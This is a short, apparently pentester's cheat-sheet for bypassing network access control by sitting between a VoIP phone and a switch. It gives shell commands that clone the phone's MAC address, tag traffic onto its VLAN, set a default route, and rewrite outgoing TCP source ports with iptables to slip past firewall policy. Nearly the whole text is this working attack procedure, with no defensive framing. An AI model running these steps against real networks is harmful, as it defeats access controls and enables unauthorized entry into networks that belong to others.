
NAC Bypass

Network access

NAC bypass scenario with VLAN tagging on a phone

upstream = the interface connected to the switch = eth0.

phy = the interface connected to the supplicant (the phone) = eth1.

# ---- only once: load the bridge-netfilter and 802.1Q VLAN modules
modprobe br_netfilter
modprobe 8021q
# ---- activate packet tagging
ifconfig eth1 down
ifconfig br0 down
vconfig add eth0 <VLAN_number>                          # creates the tagged sub-interface eth0.<VLAN_number>
ip addr add <supplicant_IP>/24 dev eth0.<VLAN_number>   # an address inside the supplicant's subnet, e.g. 192.168.190.0/24
macchanger -m <supplicant_MAC> eth0                     # clone the supplicant's MAC on the upstream interface
ifconfig eth0.<VLAN_number> up
route add default gw <gw_ip>
# ---- cleaning
ifconfig eth0.<VLAN_number> down
macchanger -p eth0                                      # restore the permanent MAC
ifconfig eth1 up

If possible, hard-code the three parameters (VLAN number, supplicant MAC and gateway IP) in the script.

./nac_bypass_setup.sh -1 eth0 -2 eth1

Then rewrite the source port of all outgoing TCP packets to one permitted by the firewall policy, for example the source port used for device administration.

iptables -t nat -I POSTROUTING -p tcp -m tcp -j MASQUERADE --to-ports <22>